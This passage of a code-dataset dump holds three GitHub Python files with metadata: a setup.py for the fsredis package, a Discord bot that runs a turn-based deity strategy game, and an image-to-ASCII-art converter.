"usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 74, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "10250783584", "text": "import os, sys\n\nfrom setuptools import setup\n\nlong_description = open(\"README.rst\").read()\ndef main():\n setup(\n name='fsredis',\n description='fsredis: in-process redis api, persisting to file system.',\n long_description = long_description,\n version=\"0.4\",\n url='http://github.com/hpk42/fsredis',\n license='MIT license',\n platforms=['unix', 'linux', 'osx', 'cygwin', 'win32'],\n author='holger krekel',\n author_email='holger at merlinux.eu',\n classifiers=['Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: MacOS :: MacOS X',\n 'Topic :: Utilities',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python'],\n py_modules = ['fsredis', \"test_fsredis\"],\n )\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hpk42/fsredis", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "42352869681", "text": "from discord.ext import commands\nimport discord\nimport logging\nimport SecretManager\nfrom main import Attributes\nimport main as db\nfrom typing import Optional\nimport HelpfileReader\nimport bot_admin\nimport Attributes\n\ndebug_mode = True\n\nresearch_cache = {}\nPREFIX = \"?\"\nbot = commands.Bot(\n command_prefix=commands.when_mentioned_or(PREFIX)\n)\n\nbot.help_command = None\n\n\n@bot.command(alias=['agpl', 'gpl', 'legal'])\nasync def license(ctx):\n await ctx.send(\"This bot is available under the AGPL license, and the source code can be found at \")\n return\n\n@bot.command()\nasync def join(ctx, name: str, *, must_be_none: Optional[str]):\n if name.casefold() in {'me', 'my'}:\n await ctx.send(\"Sorry, player name cannot be a special word\")\n if must_be_none is not None:\n await ctx.send(\"Sorry, player name must be a single word\")\n return\n result = db.create_player(name, ctx.author.id)\n await ctx.send(result[1])\n return\n\n\n@bot.command()\nasync def send(ctx, name:str, amount:int):\n sender_id = db.get_player_id_from_context(ctx)\n receiver_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n results = db.send_power(sender_id, receiver_id, amount)\n await ctx.send(results[1])\n return\n\n\n@bot.command()\nasync def pantheon(ctx, first:str, second:str):\n def check_author(author):\n def inner_check(message):\n if message.author.id != author.id:\n return False\n return True\n return inner_check\n player_id = db.get_player_id_from_context(ctx)\n if first == \"create\":\n if db.player_get_pantheon(player_id) != -1:\n await ctx.send(\"You must leave your current pantheon before you can create a new one.\")\n return\n \n name = second\n await ctx.send(\"Please enter the description.\")\n description = await bot.wait_for('message', timeout=30.0, check=check_author(ctx.author))\n description = description.content\n results = db.create_pantheon(name, description)\n db.join_pantheon(ctx.author.id, db.get_pantheon_by_name(name))\n await ctx.send(results[1])\n return\n elif first == \"leave\":\n from user_interaction import user_react_on_message\n output = \"> Are you sure you want to leave your pantheon?\\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\"\n do_leave = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_leave:\n results = db.leave_pantheon(ctx.author.id)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"Canceled.\")\n return\n\n\n@bot.command()\nasync def admin(ctx, *args):\n discord_id = ctx.author.id\n if len(args) == 0:\n await ctx.send(HelpfileReader.read(PREFIX, ('admin',)))\n return\n if db.context_grants_admin(ctx):\n if args[0] == 'tech':\n await bot_admin.tech(bot, ctx, *(args[1:]))\n elif args[0] == 'user':\n await bot_admin.user(bot, ctx, *(args[1:]))\n elif args[0] == \"newturn\":\n await bot_admin.newturn(bot, ctx)\n elif args[0] == 'kill':\n await bot_admin.kill(bot, ctx)\n elif args[0] == 'help':\n await bot_admin.help(bot, ctx, *(args[1:]))\n elif args[0] == 'pantheon':\n await bot_admin.pantheon(bot, ctx, *(args[1:]))\n elif args[0] == 'update':\n await bot_admin.update()\n elif args[0] == 'join':\n await bot_admin.join(bot, ctx, *(args[1:]))\n else:\n await ctx.send('Admin command does not exist')\n else:\n await ctx.send(\"You're not an admin. You cannot beat the system. 
Big bird is watching you.\")\n return\n\n\n@bot.command()\nasync def info(ctx, name:str = None, info_type:str = None):\n import formatting\n game_id = db.get_game_id_from_context(ctx)\n if name is None:\n output = \"> **Current game:**\\n> \\n> \"\n for base_name in db.get_player_names(game_id):\n player_id = db.get_player_by_name(base_name, game_id)\n display_name = db.get_display_name(player_id)\n output += \"**{name}**:\\n> \" \\\n \"DP: {power:.0f}\\n> \" \\\n \"Functionaries: {funcs:.0f}\\n> \" \\\n \"Personal Soldiers: {soldiers:.0f}\\n> \" \\\n \"Total Soldiers: {total_soldiers:.0f}\\n\" \\\n \"Priests: {priests:.0f}\\n> \\n> \".format(name=display_name,power=db.get_attribute(player_id, Attributes.POWER),\n funcs=db.get_attribute(player_id, Attributes.FUNCTIONARIES),\n soldiers=db.get_attribute(player_id, Attributes.SOLDIERS),\n total_soldiers=db.get_army(player_id),\n priests=db.get_attribute(player_id, Attributes.PRIESTS))\n output += \"Current turn: {turn:.0f}\".format(turn=db.current_turn(db.get_game_id_from_context(ctx)))\n await ctx.send(output)\n return\n\n player_id = None\n if name.casefold() == \"me\":\n player_id = db.get_player_id_from_context(ctx)\n else:\n player_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n \n if player_id is None:\n await ctx.send('Player {name} does not exist'.format(name=name))\n return\n\n info = db.get_player(player_id)\n if info_type is None:\n output_text = formatting.default_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"income\":\n output_text = formatting.income_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"war\":\n output_text = formatting.war_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"conversion\":\n output_text = formatting.conversion_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"research\":\n output_text = formatting.research_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"tech\":\n output_text = \"**{name}'s tech:**\".format(name=info[\"display_name\"])\n for tech_id in db.get_player_techs(player_id):\n output_text += \"\\n> \\n> {name}:\\n> \"\\\n \"*{description}*\".format(name=db.get_tech_name(tech_id),description=db.get_tech_description(tech_id))\n await ctx.send(output_text)\n return\n elif info_type == \"all\":\n await ctx.send(\"**{name}'s attributes:**\".format(name=info[\"display_name\"]))\n attributes_per_print = 20 # avoid 2000 character limit\n attributes = db.get_player_attributes(player_id)\n sliced = [attributes[i * attributes_per_print:(i + 1) * attributes_per_print] for i in range((len(attributes) + attributes_per_print - 1) // attributes_per_print)]\n for sublist in sliced:\n output_text = \"\"\n for attribute in sublist:\n output_text += \"\\n{name}: {value}\".format(name=attribute[0],value=attribute[1])\n await ctx.send(output_text)\n\n return\n\n\n@bot.command()\nasync def buff(ctx,name:str, attribute:str, amount:int = 1):\n from user_interaction import user_react_on_message\n source_id = db.get_player_id_from_context(ctx)\n target_id = None\n if name == \"me\":\n target_id = source_id\n else:\n target_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n try:\n attribute_id = db.get_attribute_id(attribute)\n except:\n await ctx.send(\"Incorrect attribute.\")\n return\n\n if db.get_army(target_id) > 0:\n cost = db.get_buff_cost(target_id, amount)\n output = f\"> You are attempting to buff 
{attribute} by {amount}. This will cost you {cost} DP.\\n> \" \\\n f\"Do you wish to continue?\\n> \" \\\n f\":thumbsup: Yes\\n> \" \\\n f\":thumbsdown: No\"\n do_buff = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_buff:\n results = db.cast_buff(source_id, attribute_id, amount, target_id)\n await ctx.send(results[1])\n return\n\n else:\n await ctx.send(\"Canceled.\")\n return\n else:\n await ctx.send(\"The target has no soldiers to buff.\")\n return\n\n\n@bot.command()\nasync def create(ctx,amount:int, type:str):\n if amount > 0:\n player_id = db.get_player_id_from_context(ctx)\n from user_interaction import user_react_on_message\n if type in [\"priests\", \"priest\"]:\n output = \"> You are creating {num:.0f} priests at a cost of {cost:.0f} per priest, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount,cost=db.get_attribute(player_id,Attributes.PRIEST_COST),\n total=amount*db.get_attribute(player_id,Attributes.PRIEST_COST))\n do_create = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_create:\n results = db.recruit_priests(player_id,amount)\n await ctx.send(results[1])\n return\n\n else:\n await ctx.send(\"Canceled.\")\n return\n\n elif type in [\"soldiers\", \"soldier\", \"troops\"]:\n output = \"> You are creating {num:.0f} soldiers at a cost of {cost:.0f} per soldier, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount, cost=db.get_attribute(player_id, Attributes.SOLDIER_COST),\n total=amount * db.get_attribute(player_id, Attributes.SOLDIER_COST))\n\n do_create = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n if do_create:\n results = db.recruit_soldiers(player_id, amount)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"Canceled.\")\n return\n else:\n await ctx.send(\"Incorrect type.\")\n return\n else:\n await ctx.send(\"> Nice try.\")\n return\n\n@bot.command()\nasync def disband(ctx,amount:int):\n if amount > 0:\n player_id = db.get_player_id_from_context(ctx)\n from user_interaction import user_react_on_message\n output = \"> You are disbanding {num:.0f} soldiers at a disband cost of {cost:.0f} per soldier, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount, cost=db.get_attribute(player_id, Attributes.SOLDIER_DISBAND_COST),\n total=amount * db.get_attribute(player_id, Attributes.SOLDIER_DISBAND_COST))\n do_disband = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n if do_disband:\n results = db.disband_soldiers(player_id,amount)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"> Canceled\")\n return\n else:\n await ctx.send(\"> Nice try.\")\n return\n\n\n@bot.command()\nasync def research(ctx, *, tech_name):\n import formatting\n from user_interaction import user_react_on_message\n tech_id = db.get_tech_id(tech_name)\n player_id = db.get_player_id_from_context(ctx)\n if tech_id is None:\n await ctx.send('> Technology \"{}\" does not exist.'.format(tech_name))\n return\n if player_id is 
None:\n await ctx.send('> You have not joined this game yet.')\n return\n success_cost = db.calculate_tech_cost(player_id, tech_id)\n multiplier = db.get_attribute(player_id, Attributes.RESEARCH_COST_MULTIPLIER)\n attempt_costs = tuple(map(lambda x: db.get_attribute(player_id, x) * multiplier, (\n Attributes.DIVINE_INSPIRATION_COST,\n Attributes.AWAKE_REVELATION_COST,\n Attributes.ASLEEP_REVELATION_COST,\n Attributes.DIVINE_AVATAR_COST\n )))\n\n success_probs = tuple(map(lambda x: db.get_attribute(player_id, x) * multiplier, (\n Attributes.DIVINE_INSPIRATION_RATE,\n Attributes.AWAKE_REVELATION_RATE,\n Attributes.ASLEEP_REVELATION_RATE,\n Attributes.DIVINE_AVATAR_RATE\n )))\n output_text = formatting.request_research_method(tech_name, success_probs, success_cost, attempt_costs)\n research_method = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': 'divine_inspiration',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': 'awake_revelation',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER C}': 'asleep_revelation',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER D}': 'divine_avatar'\n })\n if research_method is None:\n await ctx.send(\"Timed out\")\n return\n \n priest_text = '> Do you wish to use priests for this research? \\n'\\\n '> :regional_indicator_y: Yes\\n'\\\n '> :regional_indicator_n: No'\n use_priests = await user_react_on_message(bot, ctx, priest_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER Y}': True,\n '\\N{REGIONAL INDICATOR SYMBOL LETTER N}': False\n })\n if use_priests is None:\n await ctx.send(\"> Timed out\")\n return\n \n result_text = db.attempt_research(player_id, tech_id, research_method, use_priests)[1]\n await ctx.send(result_text)\n\n # ctx.author.id\n\n\n@bot.command()\nasync def battle(ctx, player_name: str, quantity: int):\n from user_interaction import user_react_on_message\n import formatting\n\n attacker_id = db.get_player_id_from_context(ctx)\n target_id = db.get_player_by_name(player_name, db.get_game_id_from_context(ctx))\n if attacker_id is None:\n await ctx.send('> You have not joined this game yet.')\n return\n if target_id is None:\n await ctx.send('> Player \"{}\" does not exist.'.format(player_name))\n return\n \n # expected_outcome = db.expected_damage(attacker_id, target_id, quantity)\n\n # # Phase 1: output text\n # output_text = formatting.battle_ask_continue(\n # player_name,\n # quantity,\n # expected_outcome[2],\n # expected_outcome[0][0],\n # expected_outcome[0][1],\n # expected_outcome[0][2],\n # expected_outcome[1]\n # )\n\n # do_battle = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n # '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': True,\n # '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': False,\n # })\n # if do_battle is None:\n # await ctx.send(\"> Timed out\")\n # return\n\n do_battle = True\n if do_battle:\n results = db.attack(attacker_id, target_id, quantity)\n if results[0]:\n remaining_attackers = db.get_attribute(attacker_id, Attributes.ATTACK_ELIGIBLE_SOLDIERS)\n remaining_soldiers = db.get_army(attacker_id)\n remaining_enemy_soldiers = db.get_army(target_id)\n result_text = formatting.battle_report(\n results[1][0][0],\n results[1][0][1],\n results[1][0][2],\n remaining_enemy_soldiers,\n results[1][1],\n remaining_soldiers,\n remaining_attackers\n )\n \n await ctx.send(\"> \" + result_text)\n return\n else:\n await ctx.send(\"> \" + str(results[1]))\n return\n else:\n await ctx.send(\"> Battle canceled.\")\n return\n\n\n@bot.command()\nasync def convert(ctx, quantity: 
int):\n from user_interaction import user_react_on_message\n import formatting\n player_discord = ctx.author.id\n\n if player_discord is None:\n await ctx.send('> You have not joined this game yet.')\n return\n\n output_text = formatting.conversion_target_type(\n db.get_attribute(player_discord, Attributes.NEUTRAL_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.NEUTRAL_CONVERSION_COST),\n db.get_attribute(player_discord, Attributes.ENEMY_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.ENEMY_CONVERSION_COST),\n db.get_attribute(player_discord, Attributes.ENEMY_PRIEST_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.ENEMY_PRIEST_CONVERSION_COST)\n )\n\n conversion_target = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': \"neutral\",\n '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': \"enemy\",\n '\\N{REGIONAL INDICATOR SYMBOL LETTER C}': \"enemy_priest\",\n })\n\n if conversion_target == \"neutral\":\n results = db.attempt_conversion(converter_player_id=player_discord,\n quantity=quantity,\n person_type=conversion_target,\n target_player_id=None)\n if results[0]:\n result_text = \"> Successfully converted {converts}.\".format(converts=results[1])\n else:\n result_text = results[1]\n await ctx.send(result_text)\n return\n elif conversion_target in [\"enemy\", \"enemy_priest\"]:\n def check(message):\n return message.author.id == ctx.author.id and db.user_name_exists(message.content)\n \n await ctx.send(\"> Please specify the player to attempt to convert away from. \\n\"\n \"Avoid unnecessary whitespaces or characters.\")\n other_player_name = (await bot.wait_for('message', timeout=30.0, check=check)).content\n other_player_id = db.get_player_by_name(other_player_name)\n\n success, results = db.attempt_conversion(converter_player_id=player_discord,\n quantity=quantity,\n person_type=conversion_target,\n target_player_id=other_player_id)\n\n if success:\n result_text = \"> Successfully converted {converts}, spending {cost} DP and priest channeling power.\".format(\n converts=results[0], cost=results[1])\n else:\n result_text = results\n \n await ctx.send(result_text)\n\n\n@bot.command()\nasync def help(ctx, *command_context):\n await ctx.send(HelpfileReader.read(PREFIX, command_context))\n\n@bot.command()\nasync def whois(ctx, member: discord.Member):\n game_id = db.get_game_id_from_context(ctx)\n name = member.name\n if member.nick:\n name = member.nick\n if db.user_discord_id_exists(member.id, game_id):\n from formatting import pretty_list\n\n player_ids = db.get_players_by_discord_id(member.id, game_id)\n display_names = map(db.get_display_name, player_ids)\n await ctx.send(\"{name} plays as {display_names}\".format(name=name, display_name=pretty_list(display_names)))\n else:\n await ctx.send(\"{name} has not joined the game\".format(name=name))\n\n@bot.command()\nasync def proxy(ctx, *, text):\n if db.context_grants_admin(ctx):\n await ctx.send(text)\n await ctx.message.delete()\n\n\ndef start_bot():\n token = SecretManager.secrets['discord']['clientToken']\n\n if token is not None and len(token) > 0:\n logging.info(\"Starting client\")\n bot.run(token)\n else:\n logging.error(\"Could not start: invalid token\")\n\n\nif __name__ == '__main__':\n start_bot()\n", "repo_name": "casithepython/handofgods", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 20358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", 
"pt": "31", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 16, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 17, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "main.create_player", "line_number": 35, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 42, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 43, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 43, "usage_type": "call"}, {"api_name": "main.send_power", "line_number": 44, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 57, "usage_type": "call"}, {"api_name": "main.player_get_pantheon", "line_number": 59, "usage_type": "call"}, {"api_name": "main.create_pantheon", "line_number": 67, "usage_type": "call"}, {"api_name": "main.join_pantheon", "line_number": 68, "usage_type": "call"}, {"api_name": "main.get_pantheon_by_name", "line_number": 68, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 76, "usage_type": "call"}, {"api_name": "main.leave_pantheon", "line_number": 82, "usage_type": "call"}, {"api_name": "HelpfileReader.read", "line_number": 94, "usage_type": "call"}, {"api_name": "main.context_grants_admin", "line_number": 96, "usage_type": "call"}, {"api_name": "bot_admin.tech", "line_number": 98, "usage_type": "call"}, {"api_name": "bot_admin.user", "line_number": 100, "usage_type": "call"}, {"api_name": "bot_admin.newturn", "line_number": 102, "usage_type": "call"}, {"api_name": "bot_admin.kill", "line_number": 104, "usage_type": "call"}, {"api_name": "bot_admin.help", "line_number": 106, "usage_type": "call"}, {"api_name": "bot_admin.pantheon", "line_number": 108, "usage_type": "call"}, {"api_name": "bot_admin.update", "line_number": 110, "usage_type": "call"}, {"api_name": "bot_admin.join", "line_number": 112, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 123, "usage_type": "call"}, {"api_name": "main.get_player_names", "line_number": 126, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 127, "usage_type": "call"}, {"api_name": "main.get_display_name", "line_number": 128, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 134, "usage_type": "call"}, {"api_name": "Attributes.POWER", "line_number": 134, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 135, "usage_type": "call"}, {"api_name": "Attributes.FUNCTIONARIES", "line_number": 135, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 136, "usage_type": "call"}, {"api_name": "Attributes.SOLDIERS", "line_number": 136, "usage_type": "attribute"}, {"api_name": "main.get_army", "line_number": 137, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 138, "usage_type": "call"}, {"api_name": "Attributes.PRIESTS", "line_number": 138, "usage_type": "attribute"}, {"api_name": "main.current_turn", "line_number": 139, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 139, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 145, "usage_type": "call"}, {"api_name": "main.get_player_by_name", 
"line_number": 147, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 147, "usage_type": "call"}, {"api_name": "main.get_player", "line_number": 153, "usage_type": "call"}, {"api_name": "formatting.default_info", "line_number": 155, "usage_type": "call"}, {"api_name": "formatting.income_info", "line_number": 159, "usage_type": "call"}, {"api_name": "formatting.war_info", "line_number": 163, "usage_type": "call"}, {"api_name": "formatting.conversion_info", "line_number": 167, "usage_type": "call"}, {"api_name": "formatting.research_info", "line_number": 171, "usage_type": "call"}, {"api_name": "main.get_player_techs", "line_number": 176, "usage_type": "call"}, {"api_name": "main.get_tech_name", "line_number": 178, "usage_type": "call"}, {"api_name": "main.get_tech_description", "line_number": 178, "usage_type": "call"}, {"api_name": "main.get_player_attributes", "line_number": 184, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 198, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 203, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 203, "usage_type": "call"}, {"api_name": "main.get_attribute_id", "line_number": 205, "usage_type": "call"}, {"api_name": "main.get_army", "line_number": 210, "usage_type": "call"}, {"api_name": "main.get_buff_cost", "line_number": 211, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 216, "usage_type": "call"}, {"api_name": "main.cast_buff", "line_number": 222, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 237, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 244, "usage_type": "call"}, {"api_name": "Attributes.PRIEST_COST", "line_number": 244, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 245, "usage_type": "call"}, {"api_name": "Attributes.PRIEST_COST", "line_number": 245, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 246, "usage_type": "call"}, {"api_name": "main.recruit_priests", "line_number": 252, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 265, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_COST", "line_number": 265, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 266, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_COST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 268, "usage_type": "call"}, {"api_name": "main.recruit_soldiers", "line_number": 273, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 289, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 295, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_DISBAND_COST", "line_number": 295, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 296, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_DISBAND_COST", "line_number": 296, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 297, "usage_type": "call"}, {"api_name": "main.disband_soldiers", "line_number": 302, "usage_type": "call"}, {"api_name": "main.get_tech_id", "line_number": 317, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 318, "usage_type": "call"}, {"api_name": "main.calculate_tech_cost", 
"line_number": 325, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 326, "usage_type": "call"}, {"api_name": "Attributes.RESEARCH_COST_MULTIPLIER", "line_number": 326, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 327, "usage_type": "call"}, {"api_name": "Attributes.DIVINE_INSPIRATION_COST", "line_number": 328, "usage_type": "attribute"}, {"api_name": "Attributes.AWAKE_REVELATION_COST", "line_number": 329, "usage_type": "attribute"}, {"api_name": "Attributes.ASLEEP_REVELATION_COST", "line_number": 330, "usage_type": "attribute"}, {"api_name": "Attributes.DIVINE_AVATAR_COST", "line_number": 331, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 334, "usage_type": "call"}, {"api_name": "Attributes.DIVINE_INSPIRATION_RATE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "Attributes.AWAKE_REVELATION_RATE", "line_number": 336, "usage_type": "attribute"}, {"api_name": "Attributes.ASLEEP_REVELATION_RATE", "line_number": 337, "usage_type": "attribute"}, {"api_name": "Attributes.DIVINE_AVATAR_RATE", "line_number": 338, "usage_type": "attribute"}, {"api_name": "formatting.request_research_method", "line_number": 340, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 341, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 354, "usage_type": "call"}, {"api_name": "main.attempt_research", "line_number": 362, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 373, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 374, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 374, "usage_type": "call"}, {"api_name": "main.attack", "line_number": 405, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 407, "usage_type": "call"}, {"api_name": "Attributes.ATTACK_ELIGIBLE_SOLDIERS", "line_number": 407, "usage_type": "attribute"}, {"api_name": "main.get_army", "line_number": 408, "usage_type": "call"}, {"api_name": "main.get_army", "line_number": 409, "usage_type": "call"}, {"api_name": "formatting.battle_report", "line_number": 410, "usage_type": "call"}, {"api_name": "formatting.conversion_target_type", "line_number": 440, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 441, "usage_type": "call"}, {"api_name": "Attributes.NEUTRAL_CONVERSION_RATE", "line_number": 441, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 442, "usage_type": "call"}, {"api_name": "Attributes.NEUTRAL_CONVERSION_COST", "line_number": 442, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 443, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_CONVERSION_RATE", "line_number": 443, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 444, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_CONVERSION_COST", "line_number": 444, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 445, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_PRIEST_CONVERSION_RATE", "line_number": 445, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 446, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_PRIEST_CONVERSION_COST", "line_number": 446, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 449, "usage_type": "call"}, {"api_name": 
"main.attempt_conversion", "line_number": 456, "usage_type": "call"}, {"api_name": "main.user_name_exists", "line_number": 468, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 473, "usage_type": "call"}, {"api_name": "main.attempt_conversion", "line_number": 475, "usage_type": "call"}, {"api_name": "HelpfileReader.read", "line_number": 491, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 494, "usage_type": "attribute"}, {"api_name": "main.get_game_id_from_context", "line_number": 495, "usage_type": "call"}, {"api_name": "main.user_discord_id_exists", "line_number": 499, "usage_type": "call"}, {"api_name": "main.get_players_by_discord_id", "line_number": 502, "usage_type": "call"}, {"api_name": "main.get_display_name", "line_number": 503, "usage_type": "attribute"}, {"api_name": "formatting.pretty_list", "line_number": 504, "usage_type": "call"}, {"api_name": "main.context_grants_admin", "line_number": 510, "usage_type": "call"}, {"api_name": "SecretManager.secrets", "line_number": 516, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 519, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 522, "usage_type": "call"}]}
+{"seq_id": "86434805528", "text": "import PIL.Image\n\n#arreglo de caracteres que reemplazaran los pixeles de la imgaen\n#cambielos para obtener diferentes resultados\n\nAsciiChars=[\"@\", \"#\", \"S\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \".\"]\n\n#funcion que le hace un resize a la imagen\n\ndef resizeImage(image, newWidth=100):\n width, height = image.size\n ratio=height/width\n newHeight=int((newWidth*ratio)/2)\n resizedImage=image.resize((newWidth, newHeight))\n return (resizedImage)\n\n#funcion que cambia elc olor de los pixeles a una escala de grises\n\ndef grayfy(image):\n grayScaleImage=image.convert(\"L\")\n return (grayScaleImage)\n\n\n#funcion que cambia pixeles por caracteres dentro de arreglo declarado arriba\ndef pixelsToAscii(image):\n pixels=image.getdata()\n characters = \"\".join([AsciiChars[pixel//25] for pixel in pixels])\n return (characters)\n\n\ndef imageToAscii(path, newWidth=100):\n try:\n image=PIL.Image.open(path)\n except:\n print(\"ruta no valida\")\n return\n newImageData=pixelsToAscii(grayfy(resizeImage(image)))\n pixel_count=len(newImageData)\n asciiImage=\"\\n\".join(newImageData[i:(i+newWidth)] for i in range(0, pixel_count, newWidth ))\n\n return(asciiImage)\n\n", "repo_name": "SenpaiSuchil/arte-generativo", "sub_path": "imageToAscii.py", "file_name": "imageToAscii.py", "file_ext": "py", "file_size_in_byte": 1190, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": 